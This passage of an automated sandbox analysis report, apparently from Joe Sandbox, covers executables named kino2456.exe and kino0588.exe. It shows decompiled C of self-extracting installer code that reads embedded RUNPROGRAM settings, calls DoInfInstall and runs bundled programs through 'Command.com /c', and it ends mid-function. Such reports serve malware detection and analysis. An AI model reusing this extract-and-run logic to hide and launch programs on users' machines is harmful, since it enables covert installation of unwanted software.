Instruction ID: fb153c358742db4f7d7d0ba776cbd95c137ad784552982ca7640762a9f123b67
Opcode Fuzzy Hash: 647c3f14521dce53b7357bdc978a0aa6d082e70e26b2233ec6f75a320f1b300f
Instruction Fuzzy Hash: F5018472D0021977DB304AA65D4EFEB777CEB85B64F14412DB905E2284D6609640FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00FC6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xfc9a3c; // 0xfc0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00FC44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x00fc651f
0x00fc652a
0x00fc6534
0x00fc656b
0x00fc6577
0x00fc657c
0x00fc6536
0x00fc653e
0x00fc6542
0x00000000
0x00fc6544
0x00fc6547
0x00fc654c
0x00fc6549
0x00fc6549
0x00fc6549
0x00fc655e
0x00fc6560
0x00fc6569
0x00000000
0x00000000
0x00fc6569
0x00fc6542
0x00fc6587

APIs

FindResourceA.KERNEL32(00FC0000,000007D6,00000005), ref: 00FC652A
LoadResource.KERNEL32(00FC0000,00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FC6538
DialogBoxIndirectParamA.USER32(00FC0000,00000000,00000547,00FC19E0,00000000), ref: 00FC6557
FreeResource.KERNEL32(00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FC6560

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 6d1534d5b8dfbc767c124b328b16a71c1faee229ddb7f4547ca67d7e7d448431
Instruction ID: 5ec0bbbd16f1a177a5759267135541520c498975402106678a386c0c838adaea
Opcode Fuzzy Hash: 6d1534d5b8dfbc767c124b328b16a71c1faee229ddb7f4547ca67d7e7d448431
Instruction Fuzzy Hash: 7001267290460EBBCB105F699D0AEBB7A6CEB85374F18052DFE00D3150D772DC10EAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC65E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00FC65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x00fc65e8
0x00fc65ed
0x00fc65ef
0x00fc65f2
0x00fc65f4
0x00fc65f4
0x00fc65f6
0x00fc65f7
0x00fc6608
0x00fc6611
0x00fc6618
0x00fc661c
0x00000000
0x00000000
0x00fc660e
0x00fc6623
0x00fc6625
0x00fc663b
0x00fc663b
0x00fc663d
0x00fc6641
0x00fc6610
0x00fc6610
0x00000000
0x00fc6610
0x00fc6644
0x00fc6647
0x00fc6647
0x00fc6621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00FC2B33), ref: 00FC6602
CharPrevA.USER32(?,00000000), ref: 00FC6612
CharPrevA.USER32(?,00000000), ref: 00FC6629
CharNextA.USER32(00000000), ref: 00FC6635

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 17e57319e6ea3b43351fc36e0a9bbd6e451f1b4cf93e3420c3119ade8ba23f49
Instruction ID: 7b3d58af2ad32567debdf926ae52f760051c536a7b6e38e4299fd5d5bab77a01
Opcode Fuzzy Hash: 17e57319e6ea3b43351fc36e0a9bbd6e451f1b4cf93e3420c3119ade8ba23f49
Instruction Fuzzy Hash: 3DF02D328081556ED7321B298E8DEB7BF9CCF87378B2D017FE491C7001D6150D06BA61

Uniqueness

Uniqueness Score: -1.00%

Function 00FC69B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0xfc81f8 = E00FC6C70();
				__set_app_type(E00FC6FBE(2));
				 *0xfc88a4 =  *0xfc88a4 | 0xffffffff;
				 *0xfc88a8 =  *0xfc88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0xfc8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0xfc851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00FC7000();
				if( *0xfc8000 == 0) {
					__setusermatherr(E00FC7000);
				}
				E00FC71EF(_t6);
				return 0;
			}

0x00fc69b7
0x00fc69c2
0x00fc69c8
0x00fc69cf
0x00fc69d8
0x00fc69de
0x00fc69e4
0x00fc69e6
0x00fc69ec
0x00fc69f2
0x00fc69f4
0x00fc6a00
0x00fc6a07
0x00fc6a0d
0x00fc6a0e
0x00fc6a15

APIs

Part of subcall function 00FC6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00FC6FC5

__set_app_type.MSVCRT ref: 00FC69C2
__p__fmode.MSVCRT ref: 00FC69D8
__p__commode.MSVCRT ref: 00FC69E6
__setusermatherr.MSVCRT ref: 00FC6A07

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: b9743a51ba79bf54a71a2c3b621868c1288cb06ece65ce41fde8bf35b905a72c
Instruction ID: 8807944f09a148ebfa291b54440b120d26be0e217a1c994add5ffb63f24dfec6
Opcode Fuzzy Hash: b9743a51ba79bf54a71a2c3b621868c1288cb06ece65ce41fde8bf35b905a72c
Instruction Fuzzy Hash: 74F0DF7054931A8FC718AB30AF0BF483BA1AB04375B140A0DE462872E0CF7AA542BA11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kino0588.exePID: 6412, Parent PID: 6392COMMON

Execution Graph

Execution Coverage:	26.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	969
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00B83BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00B83BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xb88004; // 0xfbc33aab
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xb89124 =  *0xb89124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xb88a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xb88c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00B8468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00B844B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xb89124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00B81AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00B86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00B83FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xb88580;
													if( *0xb88580 != 0) {
														E00B82267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xb88180;
											if( *0xb88180 == 0) {
												_t146 = 0x4c7;
												E00B844B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xb89124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xb89a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00B86495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00B844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xb89124 = E00B86285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00B844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xb88a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xb89a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xb88a38 & 0x0000ffff;
											_v380 = 0xb89154;
											_v376 = _t151;
											_v372 = 0xb891e4;
											_v360 = _t97;
											if( *0xb88a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xb89a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xb88d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xb89a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xb8a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xb89124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xb89a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xb88a20;
										if( *0xb88a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00B8202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00B8468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xb88c42;
									if( *0xb88c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xb88a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00B8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00B8468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00B81781( &_v276, 0x104, _t130, 0xb88c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00B8468F(_t130, 0xb89a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00b83baa
0x00b83bb0
0x00b83bb7
0x00b83bc0
0x00b83bc2
0x00b83bc9
0x00b83bcb
0x00b83bcf
0x00b83bd3
0x00b83bd9
0x00b83bfd
0x00b83bfd
0x00b83bff
0x00b83c03
0x00b83c03
0x00b83c11
0x00b83c16
0x00b83c19
0x00b83c28
0x00000000
0x00000000
0x00b83c30
0x00b83c39
0x00b83c40
0x00b83d13
0x00b83d15
0x00b83d21
0x00b83d26
0x00000000
0x00b83c4f
0x00b83c56
0x00b83c60
0x00b83c65
0x00b83c77
0x00b83c78
0x00b83c7c
0x00b83c7e
0x00b83c82
0x00b83c82
0x00000000
0x00b83c7c
0x00b83c67
0x00b83c69
0x00b83c6d
0x00000000
0x00b83c58
0x00b83c58
0x00b83c6e
0x00b83c6e
0x00b83c87
0x00b83c89
0x00b83d4d
0x00b83d4f
0x00b83d50
0x00b83d52
0x00b83d9e
0x00b83da8
0x00b83daf
0x00b83db4
0x00b83db6
0x00b83f4d
0x00b83f4d
0x00b83f4f
0x00b83f56
0x00b83f57
0x00b83f58
0x00b83f63
0x00b83f63
0x00b83dbc
0x00b83dc0
0x00b83dc2
0x00b83de6
0x00b83de6
0x00b83de8
0x00b83f0b
0x00b83f0b
0x00b83f0f
0x00b83f13
0x00b83f15
0x00b83f1a
0x00b83f1c
0x00b83f46
0x00b83f47
0x00000000
0x00b83f47
0x00b83f1e
0x00b83f1f
0x00b83f25
0x00b83f26
0x00b83f2a
0x00b83f2d
0x00b83fd9
0x00b83fd9
0x00b83fda
0x00b83fda
0x00b83fe1
0x00b83fe3
0x00b83fe3
0x00b83fe8
0x00000000
0x00b83fe8
0x00b83f33
0x00b83f37
0x00000000
0x00b83f37
0x00b83dee
0x00b83dee
0x00b83df5
0x00b83fad
0x00b83fb9
0x00b83fc2
0x00b83fc8
0x00000000
0x00b83fc8
0x00b83dfb
0x00b83dfd
0x00000000
0x00000000
0x00b83e03
0x00b83e0a
0x00000000
0x00000000
0x00b83e15
0x00b83e17
0x00b83e19
0x00b83f94
0x00b83fa4
0x00b83f7c
0x00b83f80
0x00b83f8b
0x00000000
0x00b83f8b
0x00b83e2c
0x00b83e30
0x00b83e34
0x00b83e36
0x00b83f69
0x00b83f6e
0x00b83f70
0x00b83f76
0x00000000
0x00b83f76
0x00b83e3c
0x00b83e43
0x00b83e47
0x00b83e52
0x00b83e56
0x00b83e5c
0x00b83e61
0x00b83e68
0x00b83e70
0x00b83e74
0x00b83e7c
0x00b83e80
0x00b83e82
0x00b83e82
0x00b83e87
0x00b83e87
0x00b83e8b
0x00b83e91
0x00b83e94
0x00b83e96
0x00b83e96
0x00b83e9b
0x00b83e9b
0x00b83e9f
0x00b83ea2
0x00b83ea4
0x00b83ea4
0x00b83ea9
0x00b83ea9
0x00b83ead
0x00b83eb3
0x00b83eb6
0x00b83eb8
0x00b83eb8
0x00b83ebd
0x00b83ebd
0x00b83ec1
0x00b83ec3
0x00b83ec5
0x00b83ec5
0x00b83eca
0x00b83eca
0x00b83ece
0x00b83ed5
0x00b83ed9
0x00b83ee0
0x00b83ee6
0x00b83eea
0x00b83eec
0x00b83eee
0x00b83ef3
0x00b83ef3
0x00b83ef5
0x00b83efa
0x00b83efb
0x00b83efd
0x00b83f40
0x00000000
0x00b83eff
0x00b83eff
0x00b83f05
0x00000000
0x00b83f05
0x00b83efd
0x00b83dc7
0x00b83dce
0x00000000
0x00000000
0x00b83dd0
0x00b83dd7
0x00000000
0x00000000
0x00b83dd9
0x00b83ddb
0x00000000
0x00000000
0x00b83ddd
0x00b83de1
0x00000000
0x00b83de1
0x00b83d59
0x00b83d65
0x00b83d6a
0x00b83d6c
0x00000000
0x00000000
0x00b83d6e
0x00b83d75
0x00000000
0x00000000
0x00b83d8f
0x00b83d96
0x00b83d98
0x00000000
0x00000000
0x00000000
0x00b83d98
0x00b83c8f
0x00b83c98
0x00b83cf1
0x00b83cf3
0x00000000
0x00000000
0x00b83cfe
0x00b83d11
0x00000000
0x00000000
0x00000000
0x00b83d11
0x00b83c9c
0x00b83ca5
0x00b83ca7
0x00000000
0x00000000
0x00b83cad
0x00b83cb2
0x00b83cb7
0x00b83cc5
0x00000000
0x00000000
0x00b83ce8
0x00b83cec
0x00b83ced
0x00b83ced
0x00000000
0x00b83ce8
0x00b83c9e
0x00000000
0x00b83c9e
0x00b83c56
0x00b83d35
0x00b83d35
0x00b83d3c
0x00b83d48
0x00000000
0x00b83d48
0x00b83c03
0x00b83be2
0x00b83be7
0x00b83bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00B83C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00B83CDC

Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846A0
Part of subcall function 00B8468F: SizeofResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846A9
Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846C3
Part of subcall function 00B8468F: LoadResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846CC
Part of subcall function 00B8468F: LockResource.KERNEL32(00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846D3
Part of subcall function 00B8468F: memcpy_s.MSVCRT ref: 00B846E5
Part of subcall function 00B8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00B88C42), ref: 00B83D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00B83E26
FreeLibrary.KERNEL32(00000000,?,00B88C42), ref: 00B83EFF
LocalFree.KERNEL32(?,?,?,?,00B88C42), ref: 00B83F1F
FreeLibrary.KERNEL32(00000000,?,00B88C42), ref: 00B83F40
LocalFree.KERNEL32(?,?,?,?,00B88C42), ref: 00B83F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00B88C42), ref: 00B83F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00B88C42), ref: 00B83F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00B88C42), ref: 00B83FC2

Strings

<None>, xrefs: 00B83CC9, 00B83D7D
POSTRUNPROGRAM, xrefs: 00B83D60
RUNPROGRAM, xrefs: 00B83D05
D, xrefs: 00B83C19
USRQCMD, xrefs: 00B83CAD
ADMQCMD, xrefs: 00B83C9E
advpack.dll, xrefs: 00B83F9D
REBOOT, xrefs: 00B83BE2
doza2, xrefs: 00B83E68
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B83E74
DoInfInstall, xrefs: 00B83E1F, 00B83E24, 00B83F68
SHOWWINDOW, xrefs: 00B83C34

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
API String ID: 1032054927-3533779550
Opcode ID: ec4a9c20e3e171123656f6b41d22f8af9e08f71bbb070931f5ef65b8deb7f5bc
Instruction ID: 62bee7dfdc0f2b2cb161e0a9d0a00cb1bb228ecd11b907cfa8770c12cd9a7802
Opcode Fuzzy Hash: ec4a9c20e3e171123656f6b41d22f8af9e08f71bbb070931f5ef65b8deb7f5bc
Instruction Fuzzy Hash: 45B1C2715083019BE724FF24C885B6B76E4EB84F50F1409AEFA95D71B0EB74CA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B81AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00B81AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xb88004; // 0xfbc33aab
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00B81680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00B81A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00B81781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
					E00B8658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00B81680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00B866C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00B866C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00B81680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00B81781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00B816B3( &_v1552, 0x400, " ");
										E00B816B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00B82AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
